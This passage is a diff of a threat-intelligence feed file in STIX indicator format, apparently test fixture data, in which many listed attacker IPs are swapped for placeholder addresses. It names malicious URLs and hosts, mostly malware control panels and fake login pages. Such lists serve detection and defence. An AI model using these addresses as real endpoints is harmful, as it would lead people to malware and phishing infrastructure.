http://lf4e4abf.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lf4e4abf.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:58:39.465Z"} -{"created":"2020-01-24T02:59:02.031Z","description":"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T02:59:02.031Z","name":"mal_ip: 206.217.131.245","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '206.217.131.245']","type":"indicator","valid_from":"2020-01-24T02:59:02.031Z"} +{"created":"2020-01-24T02:59:02.031Z","description":"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T02:59:02.031Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T02:59:02.031Z"} {"created":"2020-01-24T02:59:15.878Z","description":"TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime","id":"indicator--c58983e2-18fd-47b8-aab4-6c8a2e2dcb35","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-01-24T02:59:15.878Z","name":"mal_url: http://67.215.224.101/a1/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://67.215.224.101/a1/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:59:15.878Z"} -{"created":"2020-01-24T02:59:29.155Z","description":"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T02:59:29.155Z","name":"mal_ip: 162.241.73.163","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.73.163']","type":"indicator","valid_from":"2020-01-24T02:59:29.155Z"} +{"created":"2020-01-24T02:59:29.155Z","description":"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T02:59:29.155Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T02:59:29.155Z"} {"created":"2020-01-24T02:59:50.233Z","description":"TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--d5bdff38-6939-4a47-8e11-b910520565c4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-24T02:59:50.233Z","name":"mal_url: http://l60bdd58.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l60bdd58.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:59:50.233Z"} -{"created":"2020-01-24T02:59:50.255Z","description":"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1be74977-5aa6-4175-99dd-32b54863a06b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-25"],"modified":"2020-01-24T02:59:50.255Z","name":"mal_url: http://107.175.150.73/~giftioz/.azma/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.azma/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:59:50.255Z"} -{"created":"2020-01-24T02:59:52.536Z","description":"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-24T02:59:52.536Z","name":"mal_url: http://5.188.60.52/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.52/login']","type":"indicator","valid_from":"2020-01-24T02:59:52.536Z"} +{"created":"2020-01-24T02:59:50.255Z","description":"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1be74977-5aa6-4175-99dd-32b54863a06b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-25"],"modified":"2020-01-24T02:59:50.255Z","name":"mal_url: http://89.160.20.156/~giftioz/.azma/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/~giftioz/.azma/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:59:50.255Z"} +{"created":"2020-01-24T02:59:52.536Z","description":"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-24T02:59:52.536Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-24T02:59:52.536Z"} {"created":"2020-01-24T02:59:54.784Z","description":"TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--504f4011-eaea-4921-aad5-f102bef7c798","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-24T02:59:54.784Z","name":"mal_url: http://trotdeiman.ga/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trotdeiman.ga/login']","type":"indicator","valid_from":"2020-01-24T02:59:54.784Z"} -{"created":"2020-01-24T02:59:54.815Z","description":"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:59:54.815Z","name":"mal_ip: 217.8.117.8","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.8']","type":"indicator","valid_from":"2020-01-24T02:59:54.815Z"} -{"created":"2020-01-24T03:00:01.726Z","description":"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T03:00:01.726Z","name":"mal_ip: 104.223.170.113","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '104.223.170.113']","type":"indicator","valid_from":"2020-01-24T03:00:01.726Z"} +{"created":"2020-01-24T02:59:54.815Z","description":"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:59:54.815Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T02:59:54.815Z"} +{"created":"2020-01-24T03:00:01.726Z","description":"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T03:00:01.726Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T03:00:01.726Z"} {"created":"2020-01-24T03:00:01.762Z","description":"TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--0e10924c-745c-4a58-8e27-ab3a6bacd666","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T03:00:01.762Z","name":"mal_url: http://tavim.org/includes/firmino/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tavim.org/includes/firmino/admin.php']","type":"indicator","valid_from":"2020-01-24T03:00:01.762Z"} {"created":"2020-01-24T03:00:10.928Z","description":"TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--c3fb816a-cc3b-4442-be4d-d62113ae5168","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-24T03:00:10.928Z","name":"mal_url: http://onlinesecuritycenter.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://onlinesecuritycenter.xyz/login']","type":"indicator","valid_from":"2020-01-24T03:00:10.928Z"} {"created":"2020-01-24T03:00:20.166Z","description":"TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--9159e46d-f3a4-464b-ac68-8beaf87e1a8f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T03:00:20.166Z","name":"mal_url: http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T03:00:20.166Z"} @@ -78,64 +78,64 @@ {"created":"2020-01-24T03:00:55.816Z","description":"TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--6a76fa89-4d5f-40d0-9b03-671bdb2d5b4b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T03:00:55.816Z","name":"mal_url: http://tavim.org/includes/salah/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tavim.org/includes/salah/admin.php']","type":"indicator","valid_from":"2020-01-24T03:00:55.816Z"} {"created":"2020-01-24T03:01:10.501Z","description":"TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--21055dfd-d0cb-42ec-93bd-ffaeadd11d80","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-24T03:01:10.501Z","name":"mal_url: http://l0c23205.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l0c23205.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T03:01:10.501Z"} {"created":"2020-01-24T03:01:10.518Z","description":"TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--7471a595-e8b0-4c41-be4c-0a3e55675630","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T03:01:10.518Z","name":"mal_url: http://l535e9e5.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l535e9e5.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T03:01:10.518Z"} -{"created":"2020-01-24T03:01:14.843Z","description":"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-24T03:01:14.843Z","name":"mal_ip: 217.8.117.47","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.47']","type":"indicator","valid_from":"2020-01-24T03:01:14.843Z"} -{"created":"2020-01-25T02:57:12.699Z","description":"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:12.699Z","name":"mal_url: http://46.161.27.57/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.161.27.57/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:12.699Z"} -{"created":"2020-01-25T02:57:28.034Z","description":"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--54afbceb-72f3-484e-aee4-904f77beeff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-25T02:57:28.034Z","name":"mal_url: http://104.168.99.170/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.168.99.170/login']","type":"indicator","valid_from":"2020-01-25T02:57:28.034Z"} +{"created":"2020-01-24T03:01:14.843Z","description":"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-24T03:01:14.843Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-24T03:01:14.843Z"} +{"created":"2020-01-25T02:57:12.699Z","description":"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:12.699Z","name":"mal_url: http://89.160.20.156/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:12.699Z"} +{"created":"2020-01-25T02:57:28.034Z","description":"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--54afbceb-72f3-484e-aee4-904f77beeff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-25T02:57:28.034Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-25T02:57:28.034Z"} {"created":"2020-01-25T02:57:38.187Z","description":"TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--da030e10-af9f-462d-bda8-33abb223e950","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:57:38.187Z","name":"mal_url: http://officelog.org/inc/js/jstree/scan/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/scan/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:57:38.187Z"} {"created":"2020-01-25T02:57:38.214Z","description":"TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--d38e051a-bc5b-4723-884a-65e017d98299","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-01-25T02:57:38.214Z","name":"mal_url: http://f0391587.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391587.xsph.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:38.214Z"} -{"created":"2020-01-25T02:57:47.281Z","description":"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:47.281Z","name":"mal_url: http://46.161.27.57:8080/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.161.27.57:8080/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:47.281Z"} +{"created":"2020-01-25T02:57:47.281Z","description":"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:47.281Z","name":"mal_url: http://89.160.20.156:8080/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156:8080/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:47.281Z"} {"created":"2020-01-25T02:57:51.296Z","description":"TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b9715fd5-b89a-4859-b19f-55e052709227","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-25T02:57:51.296Z","name":"mal_url: http://f0393086.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0393086.xsph.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:51.296Z"} {"created":"2020-01-25T02:57:56.007Z","description":"TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--e3177515-f481-46c8-bad8-582ba0858ef3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:57:56.007Z","name":"mal_url: http://insuncos.com/files1/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files1/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:57:56.007Z"} {"created":"2020-01-25T02:57:56.044Z","description":"TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime","id":"indicator--33cdeaeb-5201-4fbb-b9ae-9c23377e7533","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:57:56.044Z","name":"mal_url: http://tg-h.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tg-h.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:56.044Z"} {"created":"2020-01-25T02:58:11.038Z","description":"TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--2baaa5f0-c2f6-4bd1-b59d-3a75931da735","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-25T02:58:11.038Z","name":"mal_url: http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-25T02:58:11.038Z"} -{"created":"2020-01-25T02:58:20.42Z","description":"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-01-25T02:58:20.42Z","name":"mal_url: http://185.234.217.36/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.234.217.36/northon/']","type":"indicator","valid_from":"2020-01-25T02:58:20.42Z"} +{"created":"2020-01-25T02:58:20.42Z","description":"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-01-25T02:58:20.42Z","name":"mal_url: http://89.160.20.156/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/northon/']","type":"indicator","valid_from":"2020-01-25T02:58:20.42Z"} {"created":"2020-01-25T02:58:20.448Z","description":"TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--a173f4b1-67ce-44f8-a6d0-bd8a24e8c593","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-25T02:58:20.448Z","name":"mal_url: http://topik07.mcdir.ru/papka/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://topik07.mcdir.ru/papka/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:20.448Z"} {"created":"2020-01-25T02:58:33.189Z","description":"TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--b53dded1-d293-4cd1-9e63-b6e0cbd850f0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:58:33.189Z","name":"mal_url: http://insuncos.com/files2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files2/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:33.189Z"} -{"created":"2020-01-25T02:58:49.056Z","description":"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-01-25T02:58:49.056Z","name":"mal_url: http://185.234.218.68/kaspersky/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.234.218.68/kaspersky/']","type":"indicator","valid_from":"2020-01-25T02:58:49.056Z"} +{"created":"2020-01-25T02:58:49.056Z","description":"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-01-25T02:58:49.056Z","name":"mal_url: http://89.160.20.156/kaspersky/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/kaspersky/']","type":"indicator","valid_from":"2020-01-25T02:58:49.056Z"} {"created":"2020-01-25T02:58:59.472Z","description":"TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--f502199a-17a4-404b-a114-fb5eda28c32c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:58:59.472Z","name":"mal_url: http://officelog.org/inc/js/jstree/mh/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/mh/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:59.472Z"} {"created":"2020-01-25T02:59:27.07Z","description":"TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--af7422eb-5d8e-4878-bdd1-395313434dae","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:59:27.07Z","name":"mal_url: http://officelog.org/inc/js/jstree/ch/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/ch/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:27.07Z"} {"created":"2020-01-25T02:59:28.967Z","description":"TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--71b36c05-86dd-4685-81c0-5a99e2e14c23","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:59:28.967Z","name":"mal_url: http://officelog.org/inc/js/jstree/dar/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/dar/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:28.967Z"} {"created":"2020-01-25T02:59:37.661Z","description":"TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--9d948509-dfb4-45b6-b8bc-780df88a213f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-25T02:59:37.661Z","name":"mal_url: http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-25T02:59:37.661Z"} -{"created":"2020-01-25T02:59:37.692Z","description":"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--9f613f8e-2040-4eee-8044-044023a8093e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-25T02:59:37.692Z","name":"mal_ip: 192.64.118.56","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.64.118.56']","type":"indicator","valid_from":"2020-01-25T02:59:37.692Z"} +{"created":"2020-01-25T02:59:37.692Z","description":"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--9f613f8e-2040-4eee-8044-044023a8093e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-25T02:59:37.692Z","name":"mal_ip: 192.168.118.56","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.168.118.56']","type":"indicator","valid_from":"2020-01-25T02:59:37.692Z"} {"created":"2020-01-25T02:59:54.296Z","description":"TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--518c3959-6c26-413f-9a5f-c8f76d86185a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:59:54.296Z","name":"mal_url: http://insuncos.com/files3/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files3/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:54.296Z"} {"created":"2020-01-25T02:59:57.748Z","description":"TS ID: 55253484347; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--625b94ec-2304-4502-a2eb-59d52cdb9c1f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-25T02:59:57.748Z","name":"mal_url: http://t95212tt.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://t95212tt.beget.tech/login']","type":"indicator","valid_from":"2020-01-25T02:59:57.748Z"} {"created":"2020-01-25T03:00:22.168Z","description":"TS ID: 55253484349; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--c8f76b97-051f-4fab-b57f-a57f37480aa0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-25T03:00:22.168Z","name":"mal_url: http://kiototan.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kiototan.site/login']","type":"indicator","valid_from":"2020-01-25T03:00:22.168Z"} -{"created":"2020-01-25T03:00:27.279Z","description":"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-25T03:00:27.279Z","name":"mal_ip: 